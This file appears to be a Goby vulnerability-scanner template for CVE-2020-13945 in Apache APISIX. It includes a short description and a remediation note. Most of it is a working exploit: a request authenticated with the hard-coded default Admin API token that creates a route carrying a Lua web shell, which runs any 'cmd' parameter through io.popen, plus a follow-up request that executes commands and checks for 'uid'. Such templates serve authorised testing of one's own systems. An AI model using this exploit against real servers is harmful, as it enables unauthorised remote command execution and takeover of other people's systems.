Apache_APISIX_Admin_API_Default_Token_CVE_2020_13945.json
{
"Name": "Apache APISIX Admin API Default Token CVE-2020-13945",
"Level": "1",
"Tags": [
"defaulttoken"
],
"GobyQuery": "header=\"APISIX\"",
"Description": "The Apache APISIX Dashboard is designed to make it as easy as possible for users to operate Apache APISIX through a frontend interface.",
"Product": "Apache APISIX Dashboard",
"Homepage": "https://apisix.apache.org/",
"Author": "",
"Impact": "In Apache APISIX, when the user has enabled the Admin API and deleted the Admin API access IP restriction rules, the default token can be used to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.",
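"Recommendation": "Replace the default Admin API token with a unique, randomly generated secret, and keep the Admin API access IP restriction rules in place so that the Admin API is reachable only from trusted management hosts. After remediation, review the configured routes for entries that administrators did not create.",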
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-13945",
"https://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html"
],
"HasExp": true,
"ExpParams": [
{
"Name": "Command",
"Type": "input",
"Value": "id"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/apisix/admin/routes",
"follow_redirect": true,
"header": {
"X-API-KEY": "edd1c9f034335f136f87ad84b625c8f1",
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\r\n \"uri\": \"/attack\",\r\n\"script\": \"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f = assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close() \\n end \\nreturn _M\",\r\n \"upstream\": {\r\n \"type\": \"roundrobin\",\r\n \"nodes\": {\r\n \"example.com:80\": 1\r\n }\r\n }\r\n}",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "201",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "attack",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/attack?cmd={{{Command}}}",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uid",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|(.*)"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}